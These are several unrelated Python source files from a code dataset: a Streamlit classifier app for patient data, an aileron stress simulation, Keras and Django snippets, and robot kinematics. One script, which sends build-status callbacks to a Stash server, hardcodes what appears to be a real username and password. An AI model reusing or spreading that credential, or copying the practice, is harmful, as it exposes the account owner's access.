machine_learning_model.fit(x_train, y_train)\r\n y_pred = machine_learning_model.predict(x_test)\r\n accuracy = machine_learning_model.score(x_test, y_test)\r\n precision = precision_score(y_test, y_pred, labels=axis_legends)\r\n recall = recall_score(y_test, y_pred, labels=axis_legends)\r\n\r\n # Find the optimal combination of iterations in order to find the C hyper-parameter\r\n # that will generate the most optimal accuracy, precision, and recall results.\r\n if (accuracy > highest_accuracy):\r\n highest_accuracy = accuracy\r\n optimal_c_accuracy = c\r\n max_num_iter_accuracy = max_iter\r\n if (precision > highest_precision):\r\n highest_precision = precision\r\n optimal_c_precision = c\r\n max_num_iter_precision = max_iter\r\n if (recall > highest_recall):\r\n highest_recall = recall\r\n optimal_c_recall = c\r\n max_num_iter_recall = max_iter\r\n # Write optimal hyper-parameters results on text file after all possible combinations\r\n f.write(\"Optimal C for Accuracy: \" + str(optimal_c_accuracy) + \"\\n\")\r\n f.write(\"Maximum Number of Iterations for Accuracy: \" + str(max_num_iter_accuracy) + \"\\n\")\r\n f.write(\"ACCURACY: \" + str(highest_accuracy) + \"\\n\")\r\n f.write(\"Optimal C for Precision: \" + str(optimal_c_precision) + \"\\n\")\r\n f.write(\"Maximum Number of Iterations for Precision: \" + str(max_num_iter_precision) + \"\\n\")\r\n f.write(\"PRECISION: \" + str(highest_precision) + \"\\n\")\r\n f.write(\"Optimal C for Recall: \" + str(optimal_c_recall) + \"\\n\")\r\n f.write(\"Maximum Number of Iterations for Recall: \" + str(max_num_iter_recall) + \"\\n\")\r\n f.write(\"RECALL: \" + str(highest_recall) + \"\\n\")\r\n f.write(\"##############################################################################\\n\")\r\n f.close()\r\n\r\n # Find Optimal Combination of Height and Depth parameters for Random Forest Classifier Method\r\n def find_optimal_hyperparameters_random_forest():\r\n dataframe = load_dataset()\r\n x_train, x_test, y_train, y_test = split_data(dataframe)\r\n # define variables for optimization\r\n highest_accuracy = 0\r\n highest_precision = 0\r\n highest_recall = 0\r\n optimal_number_of_trees_accuracy = 0\r\n optimal_depth_accuracy = 0\r\n optimal_number_of_trees_precision = 0\r\n optimal_depth_precision = 0\r\n optimal_number_of_trees_recall = 0\r\n optimal_depth_recall = 0\r\n\r\n # Find optimal depth and optimal number of trees in Random Forest Classifier Method\r\n # The number of trees in the forest\r\n for n in range(10, 600, 10):\r\n f = open(\"C:/Users/Marco/Desktop/TEST2/optimalRandomForest.txt\", \"a\")\r\n # The maximum depth of the tree.\r\n for d in range(10, 600, 10):\r\n # Random Forest hyper-parameters used: n_estimators, max_depth, bootstrap, and n_jobs\r\n machine_learning_model = RandomForestClassifier(n_estimators=n, max_depth=d, bootstrap='true', n_jobs=-1)\r\n machine_learning_model.fit(x_train, y_train)\r\n y_pred = machine_learning_model.predict(x_test)\r\n accuracy = machine_learning_model.score(x_test, y_test)\r\n precision = precision_score(y_test, y_pred, labels=axis_legends)\r\n recall = recall_score(y_test, y_pred, labels=axis_legends)\r\n\r\n # Find the optimal combination of iterations in order to find the hyper-parameters\r\n # that will generate the most optimal accuracy, precision, and recall results.\r\n if (accuracy > highest_accuracy):\r\n highest_accuracy = accuracy\r\n optimal_number_of_trees_accuracy = n\r\n optimal_depth_accuracy = d\r\n if (precision > highest_precision):\r\n highest_precision = precision\r\n optimal_number_of_trees_precision = n\r\n optimal_depth_precision = d\r\n if (recall > highest_recall):\r\n highest_recall = recall\r\n optimal_number_of_trees_recall = n\r\n optimal_depth_recall = d\r\n\r\n # Write optimal hyper-parameter results on text file after all possible combinations\r\n f.write(\"n,d:\" + str(n) + \",\" + str(d) + \"\\n\")\r\n f.write(\"Optimal height accuracy: \" + str(optimal_number_of_trees_accuracy) + \"\\n\")\r\n f.write(\"Optimal depth accuracy: \" + str(optimal_depth_accuracy) + \"\\n\")\r\n f.write(\"ACCURACY: \" + str(highest_accuracy) + \"\\n\")\r\n f.write(\"Optimal height precision: \" + str(optimal_number_of_trees_precision) + \"\\n\")\r\n f.write(\"Optimal depth precision: \" + str(optimal_depth_precision) + \"\\n\")\r\n f.write(\"PRECISION: \" + str(highest_precision) + \"\\n\")\r\n f.write(\"Optimal height recall: \" + str(optimal_number_of_trees_recall) + \"\\n\")\r\n f.write(\"Optimal depth recall: \" + str(optimal_depth_recall) + \"\\n\")\r\n f.write(\"RECALL: \" + str(highest_recall) + \"\\n\")\r\n f.close()\r\n\r\n # Plot Machine Learning Classifier Methods to display results\r\n def plot_classification_models(performance_measurement_tools):\r\n if 'Confusion Matrix' in performance_measurement_tools:\r\n st.subheader(\"Confusion Matrix\")\r\n st.subheader(\"A.D. = Alzheimer's Disease\")\r\n confusion_matrix_color = 'hot'\r\n plot_confusion_matrix(machine_learning_model, x_test, y_test, display_labels=axis_legends, cmap=confusion_matrix_color)\r\n st.pyplot()\r\n\r\n if 'ROC Curve' in performance_measurement_tools:\r\n st.subheader(\"ROC Curve\")\r\n roc_color = 'black'\r\n plot_roc_curve(machine_learning_model, x_test, y_test, color=roc_color)\r\n st.pyplot()\r\n\r\n if 'Precision-Recall Curve' in performance_measurement_tools:\r\n st.subheader('Precision-Recall Curve')\r\n precision_recall_curve_color = 'black'\r\n plot_precision_recall_curve(machine_learning_model, x_test, y_test, color=precision_recall_curve_color)\r\n st.pyplot()\r\n\r\n dataframe = load_dataset()\r\n axis_legends = [\"No A.D.\", \"A.D.\"]\r\n\r\n find_optimal_c_svm()\r\n find_optimal_hyperparameters_logistic_regression()\r\n find_optimal_hyperparameters_random_forest()\r\n\r\n x_train, x_test, y_train, y_test = split_data(dataframe)\r\n\r\n st.sidebar.subheader(\"Select a Machine Learning Classifier\")\r\n machine_learning_method = st.sidebar.selectbox(\"\",(\"Support Vector Machine (SVM)\", \"Logistic Regression\", \"Random Forest\"))\r\n # Support Vector Machine (SVM) Classifier Method\r\n if machine_learning_method == 'Support Vector Machine (SVM)':\r\n st.sidebar.subheader(\"Regularization Parameter\")\r\n # define optimal hyper-parameters C, Kernel, and Gamma for optimal Accuracy, Precision, and Recall results\r\n c_parameter = st.sidebar.number_input(\"C Hyperparameter\", 0.01, 100.0, step=0.01, key='c_parameter')\r\n kernel_parameter = st.sidebar.radio(\"Kernel\", (\"rbf\", \"linear\"), key='kernel_parameter')\r\n gamma_parameter = st.sidebar.radio(\"Gamma\", (\"scale\", \"auto\"), key='gamma_parameter')\r\n\r\n # Select Confusion Matrix, ROC Curve, Precision-Recall Curve to plot and show performance-measurement results\r\n performance_measurement_graph = st.sidebar.multiselect(\"Select Classification Model:\",\r\n ('Confusion Matrix','ROC Curve','Precision-Recall Curve'))\r\n # Show Accuracy, Precision, and Recall results and round up to four decimals only after defining parameters\r\n if st.sidebar.button(\"Show Results\", key='train_and_test'):\r\n st.subheader(\"Support Vector Machine (SVM) Results\")\r\n machine_learning_model = SVC(C=c_parameter, kernel=kernel_parameter, gamma=gamma_parameter)\r\n machine_learning_model.fit(x_train, y_train)\r\n y_pred = machine_learning_model.predict(x_test)\r\n accuracy = machine_learning_model.score(x_test, y_test)\r\n precision = precision_score(y_test, y_pred, labels=axis_legends)\r\n recall = recall_score(y_test, y_pred, labels=axis_legends)\r\n # Print Accuracy, Precision, and Recall results\r\n st.write(\"Accuracy: \", accuracy.round(4))\r\n st.write(\"Precision: \", precision.round(4))\r\n st.write(\"Recall: \", recall.round(4))\r\n # Plot Confusion Matrix, ROC Curve, Precision-Recall Curve\r\n plot_classification_models(performance_measurement_graph)\r\n\r\n # Logistic Regression Classifier Method\r\n if machine_learning_method == 'Logistic Regression':\r\n st.sidebar.subheader(\"Regularization Parameter\")\r\n # define optimal hyper-parameters for optimization function\r\n c_parameter = st.sidebar.number_input(\"C (Regularization parameter)\", 0.01, 100.0, step=0.01, key='c_parameter')\r\n maximum_iterations = st.sidebar.slider(\"Maximum number of iterations\", 1, 100, key='maximum_iterations')\r\n # Select Confusion Matrix, ROC Curve, Precision-Recall Curve to plot and show performance-measurement results\r\n performance_measurement_graph = st.sidebar.multiselect(\"Select Classification Model:\",\r\n ('Confusion Matrix','ROC Curve','Precision-Recall Curve'))\r\n # Show Accuracy, Precision, and Recall results and round up to four decimals only after defining parameters\r\n if st.sidebar.button(\"Show Results\", key='train_and_test'):\r\n st.subheader(\"Logistic Regression Results\")\r\n machine_learning_model = LogisticRegression(C=c_parameter, penalty='l2', max_iter=maximum_iterations)\r\n machine_learning_model.fit(x_train, y_train)\r\n accuracy = machine_learning_model.score(x_test, y_test)\r\n y_pred = machine_learning_model.predict(x_test)\r\n st.write(\"Accuracy: \", accuracy.round(4))\r\n st.write(\"Precision: \", precision_score(y_test, y_pred, labels=axis_legends).round(4))\r\n st.write(\"Recall: \", recall_score(y_test, y_pred, labels=axis_legends).round(4))\r\n # Plot Confusion Matrix, ROC Curve, Precision-Recall Curve\r\n plot_classification_models(performance_measurement_graph)\r\n\r\n # Random Forest Classifier Method\r\n if machine_learning_method == 'Random Forest':\r\n st.sidebar.subheader(\"Regularization Parameter\")\r\n # define optimal hyper-parameters for optimization function\r\n number_estimators = st.sidebar.number_input(\"Number of trees\", 10, 600, step=10, key='number_estimators')\r\n maximum_depth = st.sidebar.number_input(\"Maximum depth\", 10, 200, step=1, key='maximum_depth')\r\n bootstrap_samples = st.sidebar.radio(\"Bootstrap\", ('True', 'False'), key='bootstrap_samples')\r\n # Select Confusion Matrix, ROC Curve, Precision-Recall Curve to plot and show performance-measurement results\r\n performance_measurement_graph = st.sidebar.multiselect(\"Select Classification Model:\",\r\n ('Confusion Matrix','ROC Curve','Precision-Recall Curve'))\r\n # Show Accuracy, Precision, and Recall results and round up to four decimals only after defining parameters\r\n if st.sidebar.button(\"Show Results\", key='train_and_test'):\r\n st.subheader(\"Random Forest Results\")\r\n machine_learning_model = RandomForestClassifier(n_estimators=number_estimators, max_depth=maximum_depth,\r\n bootstrap=bootstrap_samples, n_jobs=-1)\r\n machine_learning_model.fit(x_train, y_train)\r\n accuracy = machine_learning_model.score(x_test, y_test)\r\n y_pred = machine_learning_model.predict(x_test)\r\n st.write(\"Accuracy: \", accuracy.round(4))\r\n st.write(\"Precision: \", precision_score(y_test, y_pred, labels=axis_legends).round(4))\r\n st.write(\"Recall: \", recall_score(y_test, y_pred, labels=axis_legends).round(4))\r\n # Plot Confusion Matrix, ROC Curve, Precision-Recall Curve\r\n plot_classification_models(performance_measurement_graph)\r\n\r\n if st.sidebar.checkbox(\"Show Raw Patient Dataset\", False):\r\n st.subheader(\"TBI Patient Data Set (Label Encoded)\")\r\n st.write(dataframe)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"machine_learning_classifier_methods.py","file_name":"machine_learning_classifier_methods.py","file_ext":"py","file_size_in_byte":17993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"405088496","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nfrom src.sections import Section\n\n\nclass Aileron(object):\n \"\"\"Class reprenting the aileron\n\n Args:\n span (float) : span of the aileron\n section_type (class) : class of the section that are are part of the aileron\n section_num (int) : number of sections present in the aileron\n\n Attributes:\n span (float) : span of the aileron\n section_num (int) : number of sections present in the aileron\n sections (list[Section]) : list of the sections the aileron has\n rib_position (list[float]) : position of the ribs\n \"\"\"\n\n def __init__(self, chord, max_thickness, span, num_sections, geometry, material_properties,\n constraints):\n self.constraints = constraints\n self.chord = chord\n self.max_thickness = max_thickness\n self.span = span\n self.num_sections = num_sections\n self.sections = [Section(x, span / num_sections, geometry, material_properties) for x in\n np.linspace(0, span, num_sections)]\n self.deflections = np.zeros((2, num_sections))\n self.twist = np.zeros(self.num_sections)\n self.slopes = np.zeros((2, num_sections))\n\n\n def find_normal_stresses(self, moment_z, moment_y, normal_forces=None):\n for section in self.sections:\n section.find_normal_stress(moment_z, moment_y, normal_forces)\n\n def find_shear_stresses(self, shear_z, shear_y, torque):\n for section in self.sections:\n section.find_pure_shear_flow(shear_z, shear_y)\n section.find_torsion_shear_flow(torque)\n section.flow2stress(section.shear_flow)\n\n def closest_section_index(self, x):\n domain = np.linspace(0, self.span, self.num_sections)\n for i, x_i in enumerate(domain):\n if x_i > x:\n return i - 1\n return len(domain) - 1\n\n # def find_deflection(self, integrator, x_0, initial_deflection):\n # section_index = self.closest_section_index(x_0)\n # self.sections[section_index].geometry.deflection = initial_deflection\n #\n # left_aileron = self.num_sections[:section_index + 1:][::-1]\n # right_aileron = self.num_sections[section_index:]\n #\n # for aileron in [left_aileron, right_aileron]:\n # for i in range(len(aileron)):\n # aileron[i + 1].geometry.deflection = integrator(aileron[i].geometry.deflection,\n # aileron[i].spanwise_dimension)\n # #\n # def find_twist(self, integrator):\n # section_index = self.closest_section_index(self.constraints.x_hinge_2)\n #\n # right_aileron = self.sections[section_index:]\n # left_aileron = self.sections[section_index + 1:]\n #\n # for i in range(len(right_aileron)-1):\n # right_aileron[i + 1].geometry.theta = integrator(right_aileron[i].spanwise_dimension,\n # right_aileron[i].geometry.theta,\n # right_aileron[i].twist_rate)\n # for i in range(len(left_aileron)-1, 0, -1):\n # left_aileron[i - 1].geometry.theta = integrator(-left_aileron[i].spanwise_dimension,\n # left_aileron[i].geometry.theta,\n # left_aileron[i].twist_rate)\n # for i, section in enumerate(self.sections):\n # self.twist[i] = section.geometry.theta - self.sections[section_index].geometry.theta\n # print([section.geometry.theta - np.pi/6 for section in self.sections])\n\n def simulate_section(self, section_index, forces, moments):\n shear_z, shear_y = forces\n moment_z, moment_y, torque = moments\n self.sections[section_index].find_pure_shear_flow(shear_z, shear_y)\n self.sections[section_index].find_torsion_shear_flow(torque)\n self.sections[section_index].find_normal_stress(moment_z, moment_y)\n self.sections[section_index].find_curvature(moment_z, moment_y)\n self.sections[section_index].find_twist_rate()\n self.sections[section_index].flow2stress(self.sections[section_index].shear_flow_pure_shear +\n self.sections[section_index].shear_flow_pure_torque)\n\n def simulate(self, first_order_integrator, forces, moments):\n # the simulation start at hinge II where the deflection and theta are known\n\n start_section_index = self.closest_section_index(self.constraints.x_hinge_2)\n self.twist[start_section_index] = self.sections[start_section_index].geometry.theta\n self.simulate_section(start_section_index, forces, moments)\n\n # simulate stresses\n for i in range(self.num_sections):\n self.simulate_section(i, forces, moments)\n\n # simulate stresses and find twist\n for i in range(start_section_index + 1, self.num_sections):\n self.twist[i] = first_order_integrator(\n self.sections[i - 1].spanwise_dimension, self.twist[i - 1],\n self.sections[i - 1].twist_rate)\n\n for i in range(start_section_index - 1, -1, -1):\n self.twist[i] = first_order_integrator(\n -self.sections[i + 1].spanwise_dimension, self.twist[i + 1],\n self.sections[i + 1].twist_rate)\n\n self.find_deflections(forward_euler)\n\n def reset_deflections(self):\n for section in self.sections:\n section.geometry.deflection = [0, 0]\n\n def find_initial_slope(self, a, b, integrator, axis):\n index_hinge_2 = self.closest_section_index(self.constraints.x_hinge_2)\n index_hinge_1 = self.closest_section_index(self.constraints.x_hinge_1)\n deflections = np.zeros(self.num_sections)\n slopes = np.zeros(self.num_sections)\n\n def simulate_deflection(slope_0):\n\n slopes[index_hinge_2] = slope_0\n for i in range(len(self.sections[:index_hinge_2]) - 1, index_hinge_1 - 1, -1):\n slopes[i] = integrator(-self.sections[i + 1].spanwise_dimension,\n slopes[i + 1],\n self.sections[i + 1].curvature[axis])\n\n for i in range(len(self.sections[:index_hinge_2]) - 1, index_hinge_1 - 1, -1):\n deflections[i] = integrator(\n -self.sections[i + 1].spanwise_dimension,\n deflections[i + 1],\n slopes[i + 1])\n\n return deflections[index_hinge_1]\n\n c = (a + b) / 2\n deflection_c = simulate_deflection(c)\n # to avoid dividing by zero\n epsilon = 10**-5\n if np.abs((self.constraints.displacement_hinge_1[axis] - deflection_c)\n / (self.constraints.displacement_hinge_1[axis] + epsilon)) < 0.001:\n return c\n else:\n if self.constraints.displacement_hinge_1[axis] > deflection_c:\n # decrease the slope\n return self.find_initial_slope(a, c, integrator, axis)\n else:\n return self.find_initial_slope(c, b, integrator, axis)\n\n def find_deflections(self, integrator):\n index_hinge_2 = self.closest_section_index(self.constraints.x_hinge_2)\n hinge_2_slopes = [self.find_initial_slope(-1, 1, integrator, axis=0),\n self.find_initial_slope(-1, 1, integrator, axis=1)]\n\n for axis in range(0, 2):\n slopes = np.zeros(self.num_sections)\n deflections = np.zeros(self.num_sections)\n slopes[index_hinge_2] = hinge_2_slopes[axis]\n\n for i in range(len(self.sections[:index_hinge_2]) - 1, - 1, -1):\n slopes[i] = integrator(-self.sections[i + 1].spanwise_dimension, slopes[i + 1],\n self.sections[i + 1].curvature[axis])\n deflections[i] = integrator(-self.sections[i + 1].spanwise_dimension,\n deflections[i + 1], slopes[i + 1])\n\n for i in range(index_hinge_2, self.num_sections-1):\n slopes[i + 1] = integrator(self.sections[i].spanwise_dimension, slopes[i],\n self.sections[i].curvature[axis])\n deflections[i + 1] = integrator(self.sections[i].spanwise_dimension, deflections[i],\n slopes[i])\n self.deflections[axis] = deflections\n self.slopes[axis] = slopes\n\n # assign delfections to the sections\n for i, section in enumerate(self.sections):\n section.geometry.deflection = self.deflections[:, i]\n\n def max_rib_shear_stress(self):\n \"\"\"Find the maximum shear stress in the ribs\"\"\"\n max_stresses_ribs = []\n for pos in self.constraints.ribs_positions:\n index = self.closest_section_index(pos)\n max_stresses_ribs.append(np.max(self.sections[index].shear_stress))\n return np.max(max_stresses_ribs), np.argmax(max_stresses_ribs)\n\n def leading_edge_pos(self):\n \"\"\"Find extreme position of the leading edge\"\"\"\n le_position_y = [\n self.deflections[1, i] - self.constraints.le_hinge_distance * np.sin(self.sections[\n i].geometry.theta)\n for i in range(self.num_sections)]\n le_position_z = [self.deflections[0, i] + self.constraints.le_hinge_distance * np.cos(self.sections[\n i].geometry.theta)\n\n for i in range(self.num_sections)]\n\n le_positions = np.zeros((2, self.num_sections))\n\n le_positions[0] = le_position_z\n le_positions[1] = le_position_y\n return le_positions\n\n def trailing_edge_pos(self):\n \"\"\"Find extreme position of the trailing edge\"\"\"\n te_position_y = [\n self.deflections[1, i] + self.constraints.hinge_te_distance * np.sin(self.sections[\n i].geometry.theta)\n for i in range(self.num_sections)]\n te_position_z = [\n self.deflections[0, i] - self.constraints.hinge_te_distance * np.cos(self.sections[\n i].geometry.theta)\n for i in range(self.num_sections)]\n\n te_positions = np.zeros((2, self.num_sections))\n\n te_positions[0] = te_position_z\n te_positions[1] = te_position_y\n return te_positions\n\n def get_von_mises_stress(self, boom_id):\n von_mises = [section.find_von_mises_stress()[boom_id] for section in self.sections]\n return von_mises\n\n def shear_stress_ribs(self):\n indexes_sections_ribs = []\n for rib_pos in self.constraints.ribs_positions:\n indexes_sections_ribs.append(self.closest_section_index(rib_pos))\n\n shear = [np.max(np.abs(self.sections[i].shear_stress)) for i in indexes_sections_ribs]\n\n return shear\n\n def max_leading_edge_pos(self):\n leading_edge_pos = self.leading_edge_pos()\n domain = np.linspace(0, self.span, self.num_sections)\n x_pos_max_y_deflection = domain[np.argmax(leading_edge_pos[1])]\n max_y_deflection = np.max(leading_edge_pos[1])\n x_pos_max_z_deflection = domain[np.argmax(leading_edge_pos[0])]\n max_z_deflection = np.max(leading_edge_pos[0])\n return (x_pos_max_z_deflection, max_z_deflection), (x_pos_max_y_deflection, max_y_deflection)\n\n def max_trailing_edge_pos(self):\n trailing_edge_pos = self.trailing_edge_pos()\n domain = np.linspace(0, self.span, self.num_sections)\n x_pos_max_y_deflection = domain[np.argmax(trailing_edge_pos[1])]\n max_y_deflection = np.max(trailing_edge_pos[1])\n x_pos_max_z_deflection = domain[np.argmax(trailing_edge_pos[0])]\n max_z_deflection = np.max(trailing_edge_pos[0])\n return (x_pos_max_z_deflection, max_z_deflection), (x_pos_max_y_deflection, max_y_deflection)\n\n def min_leading_edge_pos(self):\n leading_edge_pos = self.leading_edge_pos()\n domain = np.linspace(0, self.span, self.num_sections)\n x_pos_max_y_deflection = domain[np.argmin(leading_edge_pos[1])]\n max_y_deflection = np.min(leading_edge_pos[1])\n x_pos_max_z_deflection = domain[np.argmin(leading_edge_pos[0])]\n max_z_deflection = np.min(leading_edge_pos[0])\n return (x_pos_max_z_deflection, max_z_deflection), (x_pos_max_y_deflection, max_y_deflection)\n\n def min_trailing_edge_pos(self):\n trailing_edge_pos = self.trailing_edge_pos()\n domain = np.linspace(0, self.span, self.num_sections)\n x_pos_max_y_deflection = domain[np.argmin(trailing_edge_pos[1])]\n max_y_deflection = np.min(trailing_edge_pos[1])\n x_pos_max_z_deflection = domain[np.argmin(trailing_edge_pos[0])]\n max_z_deflection = np.min(trailing_edge_pos[0])\n return (x_pos_max_z_deflection, max_z_deflection), (x_pos_max_y_deflection, max_y_deflection)\n\n\ndef forward_euler(dx, current_value, slope):\n return current_value + slope * dx\n","sub_path":"src/aileron.py","file_name":"aileron.py","file_ext":"py","file_size_in_byte":13336,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"417844136","text":"# -*- coding: utf-8 -*-\r\n\r\n#%%\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport pandas as pd\r\nfrom tensorflow import keras\r\n\r\n#%%\r\nfrom sklearn.datasets import load_boston\r\nhousing = load_boston()\r\n\r\n#%%\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nx_train_all, x_test, y_train_all, y_test = train_test_split(\r\n housing.data, housing.target, random_state=7)\r\nx_train, x_valid, y_train, y_valid = train_test_split(\r\n x_train_all, y_train_all, random_state=11)\r\n\r\n#%%\r\nscaler = StandardScaler()\r\nx_train_scaled = scaler.fit_transform(x_train)\r\nx_valid_scaled = scaler.transform(x_valid)\r\nx_test_scaled = scaler.transform(x_test)\r\n\r\n#%%\r\n#multi input\r\ninput_wide = keras.layers.Input(shape=[7])\r\ninput_deep = keras.layers.Input(shape=[8])\r\nhidden1 = keras.layers.Dense(20, activation='relu')(input_deep)\r\nhidden2 = keras.layers.Dense(20, activation='relu')(hidden1)\r\nconcat = keras.layers.concatenate([input_wide, hidden2])\r\noutput = keras.layers.Dense(1)(concat)\r\noutput2 = keras.layers.Dense(1)(hidden2)\r\nmodel = keras.models.Model(inputs=[input_wide, input_deep],\r\n outputs=[output, output2])\r\n\r\nmodel.summary()\r\nmodel.compile(loss='mean_squared_error', optimizer='sgd')\r\ncallbacks = [keras.callbacks.EarlyStopping(\r\n patience=5,min_delta=1e-3)]\r\n\r\n#%%\r\nx_train_scaled_wide = x_train_scaled[:, :7]\r\nx_train_scaled_deep = x_train_scaled[:, 5:]\r\nx_valid_scaled_wide = x_valid_scaled[:, :7]\r\nx_valid_scaled_deep = x_valid_scaled[:, 5:]\r\nx_test_scaled_wide = x_test_scaled[:, :7]\r\nx_test_scaled_deep = x_test_scaled[:, 5:]\r\n\r\n\r\nhistory = model.fit([x_train_scaled_wide, x_train_scaled_deep], \r\n [y_train, y_train],\r\n validation_data=([x_valid_scaled_wide,\r\n x_valid_scaled_deep],\r\n [y_valid, y_valid]),\r\n epochs=100,\r\n callbacks=callbacks)\r\n\r\n#%%\r\ndef plot_learning_curves(history):\r\n pd.DataFrame(history.history).plot(figsize=(8, 5))\r\n plt.grid(True)\r\n #plt.gca().set_ylim(0, 1)\r\n plt.show()\r\n\r\nplot_learning_curves(history)\r\n\r\n#%%\r\nmodel.evaluate([x_test_scaled_wide, x_test_scaled_deep], [y_test, y_test])","sub_path":"chapter_2/7_widedeep_keras_multi_outputs.py","file_name":"7_widedeep_keras_multi_outputs.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"239801784","text":"import pandas as pd\nfw = open('matrix.txt','r')\nmatrix_dict = {}\ncol_slot_name = ['O']\nrow_slot_name = ['O']\nfor line in fw:\n line = line.strip()\n r_s, c_s, p_s = line.split('\\t')\n if c_s not in col_slot_name:\n col_slot_name.append(c_s)\n if ('O', c_s) not in matrix_dict:\n matrix_dict[('O',c_s)] = 0\n if (c_s,'O') not in matrix_dict:\n matrix_dict[(c_s, 'O')] = 0\n if r_s not in row_slot_name:\n row_slot_name.append(r_s)\n if ('O', r_s) not in matrix_dict:\n matrix_dict[('O',r_s)] = 0\n if (r_s,'O') not in matrix_dict:\n matrix_dict[(r_s, 'O')] = 0\n\n if (c_s, p_s) not in matrix_dict:\n matrix_dict[(c_s, p_s)] = 1\n else:\n matrix_dict[(c_s, p_s)] += 1\n\nrow_slot_name = sorted(row_slot_name)\ncol_slot_name_temp = sorted(row_slot_name)\nfor temp_slot in col_slot_name:\n if temp_slot not in col_slot_name_temp:\n col_slot_name_temp.append(temp_slot)\n\ncol_slot_name = col_slot_name_temp\n\ndf = pd.DataFrame(columns=['first']+row_slot_name)\n# print(df.columns.values)\nfor col_s_n in col_slot_name:\n temp_d = {'first':col_s_n}\n for row_s_n in row_slot_name:\n # print(row_s_n)\n # print(col_s_n)\n # print(row_s_n)\n # print('-'*20)\n if (col_s_n, row_s_n) not in matrix_dict:\n temp_d[row_s_n] = int(0)\n else: \n temp_d[row_s_n] = round(int(matrix_dict[(col_s_n,row_s_n)]) / 15000, 2)\n # temp_d[row_s_n] = int(matrix_dict[(col_s_n,row_s_n)]) \n df.loc[df.shape[0]] = temp_d\n\ndf.to_csv('matrix.csv')\n\n# for i in range(1, df.shape[0]):\n# df.loc[i][1] /= int(sum_list[i])\n\n# print(df.iloc[1:,1:]/sum_list)","sub_path":"graphbased/creatematrix.py","file_name":"creatematrix.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"217475732","text":"from typing import Type\n\nfrom ._base import ComposedConfiguration, ConfigMixin\n\n\nclass RestFrameworkMixin(ConfigMixin):\n \"\"\"\n Configure Django REST Framework.\n\n This requires the `django-cors-headers` and `drf-yasg` packages to be installed.\n \"\"\"\n\n @staticmethod\n def before_binding(configuration: Type[ComposedConfiguration]) -> None:\n configuration.INSTALLED_APPS += ['rest_framework', 'rest_framework.authtoken', 'drf_yasg']\n\n REST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n 'rest_framework.authentication.BasicAuthentication',\n 'rest_framework.authentication.TokenAuthentication',\n ]\n }\n\n SWAGGER_SETTINGS = {\n 'SECURITY_DEFINITIONS': {\n 'Basic': {'type': 'basic'},\n 'Bearer': {'type': 'apiKey', 'name': 'Authorization', 'in': 'header'},\n }\n }\n\n REDOC_SETTINGS = {\n 'SECURITY_DEFINITIONS': {\n 'Basic': {'type': 'basic'},\n 'Bearer': {'type': 'apiKey', 'name': 'Authorization', 'in': 'header'},\n }\n }\n","sub_path":"django_girders/configuration/_rest_framework.py","file_name":"_rest_framework.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"209129348","text":"import requests\r\nimport socket\r\nimport json\r\nimport time\r\nimport logging\r\n\r\nlogging.basicConfig(level=logging.INFO)\r\nlogger = logging.getLogger(__name__)\r\n\r\ndef send_stash_callback(state, commit_id, task_name, result_url = None):\r\n \r\n #JSNO describe here : https://developer.atlassian.com/stash/docs/latest/how-tos/updating-build-status-for-commits.html\r\n stash_url = 'http://rndwww.nce.1a.net/git'\r\n rest_api = '/rest/build-status/1.0/commits/'\r\n \r\n stash_callback_url = stash_url + rest_api + commit_id\r\n #TOFIX: the port default value is vary ugly, maybe pass result_url as param\r\n if result_url is None:\r\n result_url = 'http://{}:{}/hydra/api/v1.0/result/{}/{}'.format(socket.getfqdn(), 5000, commit_id, task_name)\r\n #add hostname in the key to support the stash callback from multiple host\r\n key = '{}_{}'.format(task_name, socket.gethostname())\r\n callback_content = {}\r\n callback_content.update({'state': state, 'key': key, 'url': result_url, 'description': key }) \r\n headers = {'Content-type': 'application/json'}\r\n #retry 3 times if status post failed\r\n for i in xrange(3):\r\n r = requests.post(stash_callback_url, \r\n data= json.dumps(callback_content), \r\n headers = headers,\r\n auth=('hbian', 'bhz_ama_8'))\r\n if r.status_code == requests.codes.ok:\r\n break\r\n else:\r\n logger.info(\"Post stash callback failed status code: {} callback_url: {} \".format(r.status_code, stash_callback_url))\r\n time.sleep(5)","sub_path":"libs/software_workbench.py","file_name":"software_workbench.py","file_ext":"py","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"244214107","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\nclass twolink():\n \"\"\" This class is meant for fk and ik operations around a 2-link manipulator. \"\"\"\n \n def __init__(self, length1, length2):\n \"\"\" Class initialization \"\"\"\n self.a1 = length1\n self.a2 = length2\n\n def fk(self, theta1, theta2):\n \"\"\" Calculate the forward kinematics to determine the x & y values \"\"\"\n x = self.a2 * np.cos(theta1 + theta2) + self.a1 * np.cos(theta1)\n y = self.a2 * np.sin(theta1 + theta2) + self.a1 * np.sin(theta1)\n return x,y\n\n def ik(self, x, y):\n \"\"\" Calculates the inverse kinematics to determine the theta1 & theta2 values \"\"\"\n D = (x*x + y*y - self.a1 * self.a1 - self.a2 * self.a2) / (2 * self.a1 * self.a2)\n theta2 = np.arctan2(np.sqrt(1 - D * D), D)\n gamma = np.arctan2((self.a2 * np.sin(theta2)), (self.a1 + self.a2 * np.cos(theta2)))\n theta1 = np.arctan2(y, x) - gamma\n\n return theta1, theta2\n\n def plot(self, funct, show = True):\n \"\"\" Adds a function to the plot and shows it or not \"\"\"\n plt.plot(funct[0], funct[1])\n if show:\n plt.show()\n\n \n\n\n\ndef func1():\n x = np.arange(0, 25, 0.05)\n y = 25 - x\n return x,y\n\ndef func2():\n t = np.arange(0, np.pi, 0.05)\n x = 10 * np.cos(t) + 15\n y = 10 * np.sin(t)\n return 